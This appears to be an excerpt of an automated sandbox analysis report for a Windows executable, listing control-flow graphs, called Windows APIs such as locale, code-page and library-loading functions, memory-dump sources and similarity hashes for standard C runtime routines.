                                                                                    control_flow_graph 47 38f058-38f064 48 38f0f6-38f0f9 47->48 49 38f069-38f07a 48->49 50 38f0ff 48->50 52 38f07c-38f07f 49->52 53 38f087-38f0a0 LoadLibraryExW 49->53 51 38f101-38f105 50->51 54 38f11f-38f121 52->54 55 38f085 52->55 56 38f0a2-38f0ab GetLastError 53->56 57 38f106-38f116 53->57 54->51 61 38f0f3 55->61 58 38f0ad-38f0bf call 38e788 56->58 59 38f0e4-38f0f1 56->59 57->54 60 38f118-38f119 FreeLibrary 57->60 58->59 64 38f0c1-38f0d3 call 38e788 58->64 59->61 60->54 61->48 64->59 67 38f0d5-38f0e2 LoadLibraryExW 64->67 67->57 67->59
                                                                                    APIs
                                                                                    • FreeLibrary.KERNEL32(00000000,?,0038F165,?,?,00000000,00000000,?,?,0038F38F,00000021,FlsSetValue,003A02C0,003A02C8,00000000), ref: 0038F119
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2105229023.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2105206125.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2105252055.000000000039D000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003D9000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2105320777.00000000003DC000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_380000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: FreeLibrary
                                                                                    • String ID: api-ms-$ext-ms-
                                                                                    • API String ID: 3664257935-537541572
                                                                                    • Opcode ID: 77216eb96de98b60995c8e80b430e5ed28e0524e5ed42f4638c751b201d87ebd
                                                                                    • Instruction ID: 5645cb83f1f94f31789ea291e483f051bfc96df5b46b5423144000e40fdd740a
                                                                                    • Opcode Fuzzy Hash: 77216eb96de98b60995c8e80b430e5ed28e0524e5ed42f4638c751b201d87ebd
                                                                                    • Instruction Fuzzy Hash: D9219076A01710AFEB23BB65EC45A9A376CAB41764F2601A1E906A7291E731ED01C7E0

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 68 392a91-392aaa 69 392aac-392abc call 38b34b 68->69 70 392ac0-392ac5 68->70 69->70 77 392abe 69->77 71 392ad4-392afa call 393c28 70->71 72 392ac7-392ad1 70->72 78 392c6d-392c7e call 384791 71->78 79 392b00-392b0b 71->79 72->71 77->70 81 392b11-392b16 79->81 82 392c60 79->82 84 392b18-392b21 call 384b20 81->84 85 392b2b-392b36 call 391e71 81->85 86 392c62 82->86 93 392b41-392b45 84->93 94 392b23-392b29 84->94 85->93 95 392b38 85->95 89 392c64-392c6b call 384522 86->89 89->78 93->86 97 392b4b-392b62 call 393c28 93->97 98 392b3e 94->98 95->98 97->86 101 392b68-392b7a call 38f4f2 97->101 98->93 103 392b7f-392b83 101->103 104 392b9e-392ba0 103->104 105 392b85-392b8d 103->105 104->86 106 392b8f-392b94 105->106 107 392bc7-392bd3 105->107 110 392b9a-392b9c 106->110 111 392c46-392c48 106->111 108 392c52 107->108 109 392bd5-392bd7 107->109 114 392c54-392c5b call 384522 108->114 112 392bd9-392be2 call 384b20 109->112 113 392bec-392bf7 call 391e71 109->113 110->104 115 392ba5-392bbf call 38f4f2 110->115 111->89 112->114 124 392be4-392bea 112->124 113->114 125 392bf9 113->125 114->104 115->111 126 392bc5 115->126 127 392bff-392c04 124->127 125->127 126->104 127->114 128 392c06-392c1e call 38f4f2 127->128 128->114 131 392c20-392c27 128->131 132 392c29-392c2a 131->132 133 392c4a-392c50 131->133 134 392c2b-392c3d call 393ca4 132->134 133->134 134->114 137 392c3f-392c45 call 384522 134->137 137->111
                                                                                    APIs
                                                                                    • __alloca_probe_16.LIBCMT ref: 00392B18
                                                                                    • __alloca_probe_16.LIBCMT ref: 00392BD9
                                                                                    • __freea.LIBCMT ref: 00392C40
                                                                                      • Part of subcall function 00391E71: HeapAlloc.KERNEL32(00000000,00000000,?,?,00385315,?,?,?,?,?,003810FC,?,00000001), ref: 00391EA3
                                                                                    • __freea.LIBCMT ref: 00392C55
                                                                                    • __freea.LIBCMT ref: 00392C65
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2105229023.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2105206125.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2105252055.000000000039D000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003D9000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2105320777.00000000003DC000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_380000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                                    • String ID:
                                                                                    • API String ID: 1096550386-0
                                                                                    • Opcode ID: 02294e7ded30756a6a5f002de19a0bfce684aa9fcb95a829e2d6eb9f351983eb
                                                                                    • Instruction ID: 6ff925b5ac10260b2ccc55cd541ab57dca8442e145f0f4cefa94ea367905bf6e
                                                                                    • Opcode Fuzzy Hash: 02294e7ded30756a6a5f002de19a0bfce684aa9fcb95a829e2d6eb9f351983eb
                                                                                    • Instruction Fuzzy Hash: A5519172600616BFEF27AF64DC81EBF77A9EF44350B260169FD09EA150EA30CD148B60

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 140 38f4f2-38f501 call 38f024 143 38f52a-38f544 call 38f54f LCMapStringW 140->143 144 38f503-38f528 LCMapStringEx 140->144 148 38f54a-38f54c 143->148 144->148
                                                                                    APIs
                                                                                    • LCMapStringEx.KERNELBASE(?,00392B7F,?,?,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 0038F526
                                                                                    • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,00392B7F,?,?,00000000,?,00000000), ref: 0038F544
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2105229023.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2105206125.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2105252055.000000000039D000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003D9000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2105320777.00000000003DC000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_380000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: String
                                                                                    • String ID: |,8
                                                                                    • API String ID: 2568140703-3013188374
                                                                                    • Opcode ID: cd137eb19b550768f95cc5bbd5d94267cd014013fb34258c8eefc9009b0d55f7
                                                                                    • Instruction ID: 29823c59cdda8648387b7414c5a1fd09e354cb20fd14b8bb5b58ebce85f1739b
                                                                                    • Opcode Fuzzy Hash: cd137eb19b550768f95cc5bbd5d94267cd014013fb34258c8eefc9009b0d55f7
                                                                                    • Instruction Fuzzy Hash: BCF0683200021ABBCF136FA1DC059EE3F6AFB58760F058161FA192A121C632CA31AB90

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • GetCurrentProcess.KERNEL32(?,?,0038C153,00000016,00388E0A,?,?,ECD46234,00388E0A,?), ref: 0038C16A
                                                                                    • TerminateProcess.KERNEL32(00000000,?,0038C153,00000016,00388E0A,?,?,ECD46234,00388E0A,?), ref: 0038C171
                                                                                    • ExitProcess.KERNEL32 ref: 0038C183
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2105229023.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2105206125.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2105252055.000000000039D000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003D9000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2105320777.00000000003DC000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_380000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Process$CurrentExitTerminate
                                                                                    • String ID:
                                                                                    • API String ID: 1703294689-0
                                                                                    • Opcode ID: 4d59c9d16366d2b95583fdceab782bff499f3c38bce6b700187f36a01419e19e
                                                                                    • Instruction ID: e363cf1e381aa46b5d760637f944cf0ae1ccc3c1589832a28cf2a0b08f01c991
                                                                                    • Opcode Fuzzy Hash: 4d59c9d16366d2b95583fdceab782bff499f3c38bce6b700187f36a01419e19e
                                                                                    • Instruction Fuzzy Hash: 07D09232010248ABCF133F71ED4E9593F2ABF41385F445051B9098A232CB3799639BA0

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 156 394daf-394dd7 call 3948df 159 394ddd-394de3 156->159 160 394f9f-394fa0 call 394950 156->160 161 394de6-394dec 159->161 165 394fa5-394fa7 160->165 163 394eee-394f0d call 385f00 161->163 164 394df2-394dfe 161->164 175 394f10-394f15 163->175 164->161 166 394e00-394e06 164->166 168 394fa8-394fb6 call 384791 165->168 170 394e0c-394e18 IsValidCodePage 166->170 171 394ee6-394ee9 166->171 170->171 174 394e1e-394e25 170->174 171->168 176 394e4d-394e5a GetCPInfo 174->176 177 394e27-394e33 174->177 178 394f52-394f5c 175->178 179 394f17-394f1c 175->179 182 394eda-394ee0 176->182 183 394e5c-394e7b call 385f00 176->183 180 394e37-394e43 call 3949b3 177->180 178->175 181 394f5e-394f88 call 3948a1 178->181 184 394f4f 179->184 185 394f1e-394f26 179->185 192 394e48 180->192 196 394f89-394f98 181->196 182->160 182->171 183->180 197 394e7d-394e84 183->197 184->178 186 394f28-394f2b 185->186 187 394f47-394f4d 185->187 191 394f2d-394f33 186->191 187->179 187->184 191->187 195 394f35-394f45 191->195 192->165 195->187 195->191 196->196 198 394f9a 196->198 199 394eb0-394eb3 197->199 200 394e86-394e8b 197->200 198->160 201 394eb8-394ebf 199->201 200->199 202 394e8d-394e95 200->202 201->201 205 394ec1-394ed5 call 3948a1 201->205 203 394ea8-394eae 202->203 204 394e97-394e9e 202->204 203->199 203->200 206 394e9f-394ea6 204->206 205->180 206->203 206->206
                                                                                    APIs
                                                                                      • Part of subcall function 003948DF: GetOEMCP.KERNEL32(00000000,?,?,00000000,?), ref: 0039490A
                                                                                    • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,?,?,?,?,00394BF6,?,00000000,?,00000000,?), ref: 00394E10
                                                                                    • GetCPInfo.KERNEL32(00000000,?,?,?,?,?,?,?,?,00394BF6,?,00000000,?,00000000,?), ref: 00394E52
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2105229023.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2105206125.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2105252055.000000000039D000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003D9000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2105320777.00000000003DC000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_380000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CodeInfoPageValid
                                                                                    • String ID:
                                                                                    • API String ID: 546120528-0
                                                                                    • Opcode ID: 3079d7985eb68ce4f5e1ff58b4e741ffa0cdcdc0338b1b6ab9479b602108faf6
                                                                                    • Instruction ID: 37c8c863a0b254405df8b2386a28024c6ce60eed1a42ebbb8080d34fafdc57f1
                                                                                    • Opcode Fuzzy Hash: 3079d7985eb68ce4f5e1ff58b4e741ffa0cdcdc0338b1b6ab9479b602108faf6
                                                                                    • Instruction Fuzzy Hash: 1951EE71E042469EDF22CF35C881AABBBE9FF81304F1941AED0868B651E7759947CB90

                                                                                    APIs
                                                                                    • GetCPInfo.KERNEL32(E8458D00,?,00394C02,00394BF6,00000000), ref: 003949E5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2105229023.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2105206125.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2105252055.000000000039D000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003D9000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2105320777.00000000003DC000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_380000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Info
                                                                                    • String ID:
                                                                                    • API String ID: 1807457897-0
                                                                                    • Opcode ID: 4354bf78757ec9785c5e3dcf43c72ac1647826fac8c83460e9e006b32a4bdba9
                                                                                    • Instruction ID: 8044ba6279eabfb06d05788606d497e4012319da2d03ae2a8e784184228c3a9a
                                                                                    • Opcode Fuzzy Hash: 4354bf78757ec9785c5e3dcf43c72ac1647826fac8c83460e9e006b32a4bdba9
                                                                                    • Instruction Fuzzy Hash: D85137719042589ADF238A28CD80FE67BBCEB56304F2405E9E59AD7182D335AD47DF20

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2105229023.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2105206125.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2105252055.000000000039D000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003D9000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2105320777.00000000003DC000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_380000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: eb7e32fe45b910487da9300940a80d68ad317ddf9c31a82d49d010bed5b4080f
                                                                                    • Instruction ID: 9e3290205d0a49298335f691da52e0b0e5186fa7630e05380ee469752f9fd1e7
                                                                                    • Opcode Fuzzy Hash: eb7e32fe45b910487da9300940a80d68ad317ddf9c31a82d49d010bed5b4080f
                                                                                    • Instruction Fuzzy Hash: 0A01F533314315DFAB13EE69EC44A6A339EABC9320B2542B1F904EB284DA34D8019750
                                                                                    APIs
                                                                                    • GetLocaleInfoW.KERNEL32(?,2000000B,dy9,00000002,00000000,?,?,?,00397964,?,00000000), ref: 003976DF
                                                                                    • GetLocaleInfoW.KERNEL32(?,20001004,dy9,00000002,00000000,?,?,?,00397964,?,00000000), ref: 00397708
                                                                                    • GetACP.KERNEL32(?,?,00397964,?,00000000), ref: 0039771D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2105229023.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2105206125.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2105252055.000000000039D000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003D9000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2105320777.00000000003DC000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_380000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: InfoLocale
                                                                                    • String ID: ACP$OCP$dy9
                                                                                    • API String ID: 2299586839-3293070593
                                                                                    • Opcode ID: 81f80384bb236c70e6dd4fbd3ae4a951ea2ca04e5c7d663c5ae52379b9d65d2c
                                                                                    • Instruction ID: 4372084dc8c430ba262626a77c933c36f552135011b473bc27f78b3252ad6e00
                                                                                    • Opcode Fuzzy Hash: 81f80384bb236c70e6dd4fbd3ae4a951ea2ca04e5c7d663c5ae52379b9d65d2c
                                                                                    • Instruction Fuzzy Hash: 5E218622628501A6DF378F68C901BA773ABEF54B64F578424E90AD7190F732DD41C350
                                                                                    APIs
                                                                                      • Part of subcall function 0038EB00: GetLastError.KERNEL32(?,00000008,00393006), ref: 0038EB04
                                                                                      • Part of subcall function 0038EB00: SetLastError.KERNEL32(00000000,00000000,00000002,000000FF), ref: 0038EBA6
                                                                                    • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 00397927
                                                                                    • IsValidCodePage.KERNEL32(00000000), ref: 00397970
                                                                                    • IsValidLocale.KERNEL32(?,00000001), ref: 0039797F
                                                                                    • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 003979C7
                                                                                    • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 003979E6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2105229023.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2105206125.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2105252055.000000000039D000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003D9000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2105320777.00000000003DC000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_380000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                    • String ID:
                                                                                    • API String ID: 415426439-0
                                                                                    • Opcode ID: 3edf6564807ccd163cfd03e0b24a4673b4fb06e475afa9b16adc834719510384
                                                                                    • Instruction ID: 782ed0c3123369905873c21936bb845719afc5467c52b4efd5a165cda77ae72a
                                                                                    • Opcode Fuzzy Hash: 3edf6564807ccd163cfd03e0b24a4673b4fb06e475afa9b16adc834719510384
                                                                                    • Instruction Fuzzy Hash: C1517072A28206AFEF12EFA5CC45ABE77B8FF05700F154469F915EB190E7709901CB61
                                                                                    APIs
                                                                                      • Part of subcall function 0038EB00: GetLastError.KERNEL32(?,00000008,00393006), ref: 0038EB04
                                                                                      • Part of subcall function 0038EB00: SetLastError.KERNEL32(00000000,00000000,00000002,000000FF), ref: 0038EBA6
                                                                                    • GetACP.KERNEL32(?,?,?,?,?,?,0038CB0C,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00396F78
                                                                                    • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,0038CB0C,?,?,?,00000055,?,-00000050,?,?), ref: 00396FA3
                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 00397106
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2105229023.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2105206125.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2105252055.000000000039D000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003D9000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2105320777.00000000003DC000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_380000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$CodeInfoLocalePageValid
                                                                                    • String ID: utf8
                                                                                    • API String ID: 607553120-905460609
                                                                                    • Opcode ID: 038c76f1b5f83c4acde67f37db378e3992b3959a4890665db9f10b7916ea7d62
                                                                                    • Instruction ID: a1ab357d8aa9340c1285947506e51d2fa4134ed77672f5d1062019ecb670b89e
                                                                                    • Opcode Fuzzy Hash: 038c76f1b5f83c4acde67f37db378e3992b3959a4890665db9f10b7916ea7d62
                                                                                    • Instruction Fuzzy Hash: EA71E372A15306AADF26AB74DC47BAA73A8EF45700F11446AF506DB2C1EB70ED408760
                                                                                    APIs
                                                                                    • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00384E32
                                                                                    • IsDebuggerPresent.KERNEL32 ref: 00384EFE
                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00384F17
                                                                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 00384F21
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2105229023.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2105206125.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2105252055.000000000039D000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003D9000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2105320777.00000000003DC000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_380000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                    • String ID:
                                                                                    • API String ID: 254469556-0
                                                                                    • Opcode ID: 0ab525bb614da602efa7d1f06c78332bc880299c0b8a75ab580e658c8cec34c1
                                                                                    • Instruction ID: 7ead0a4f6ef66431de663501735a7bc5fd6e9dd7dc70fbad2c9eeed2d28cb6fd
                                                                                    • Opcode Fuzzy Hash: 0ab525bb614da602efa7d1f06c78332bc880299c0b8a75ab580e658c8cec34c1
                                                                                    • Instruction Fuzzy Hash: 3131E4B5D053199ADF21EFA4D949BCDBBB8BF08300F1041EAE508AB250EB759A85CF45
                                                                                    APIs
                                                                                      • Part of subcall function 0038EB00: GetLastError.KERNEL32(?,00000008,00393006), ref: 0038EB04
                                                                                      • Part of subcall function 0038EB00: SetLastError.KERNEL32(00000000,00000000,00000002,000000FF), ref: 0038EBA6
                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0039731E
                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00397368
                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0039742E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2105229023.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2105206125.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2105252055.000000000039D000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003D9000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2105320777.00000000003DC000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_380000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: InfoLocale$ErrorLast
                                                                                    • String ID:
                                                                                    • API String ID: 661929714-0
                                                                                    • Opcode ID: 00e2c96f47fba832c692a43f023720bc52881b65ba09d2fc1bbd2eae651d52d6
                                                                                    • Instruction ID: 5846f97f1caf31663a80b0a3afc0a6969be1116cb526dd94bfde951cac162fba
                                                                                    • Opcode Fuzzy Hash: 00e2c96f47fba832c692a43f023720bc52881b65ba09d2fc1bbd2eae651d52d6
                                                                                    • Instruction Fuzzy Hash: C46180715282179FDF2A9F29CC82BBA7BA8EF05300F1140AAED15CA6C6F734D951CB50
                                                                                    APIs
                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00388F03
                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00388F0D
                                                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00388F1A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2105229023.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2105206125.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2105252055.000000000039D000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003D9000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2105320777.00000000003DC000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_380000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                    • String ID:
                                                                                    • API String ID: 3906539128-0
                                                                                    APIs
                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,0038D672,?,20001004,00000000,00000002,?,?,0038CC74), ref: 0038F3E9
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2105229023.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: InfoLocale
                                                                                    • String ID: |,8
                                                                                    • API String ID: 2299586839-3013188374
                                                                                    APIs
                                                                                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,?,?,?,003933CB,?,?,?,?,?,?,00000000), ref: 003935FD
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2105229023.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: ExceptionRaise
                                                                                    • String ID:
                                                                                    • API String ID: 3997070919-0
                                                                                    APIs
                                                                                    • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00384B62
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2105229023.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: FeaturePresentProcessor
                                                                                    • String ID:
                                                                                    • API String ID: 2325560087-0
                                                                                    APIs
                                                                                      • Part of subcall function 0038EB00: GetLastError.KERNEL32(?,00000008,00393006), ref: 0038EB04
                                                                                      • Part of subcall function 0038EB00: SetLastError.KERNEL32(00000000,00000000,00000002,000000FF), ref: 0038EBA6
                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00397571
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2105229023.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$InfoLocale
                                                                                    • String ID:
                                                                                    • API String ID: 3736152602-0
                                                                                    APIs
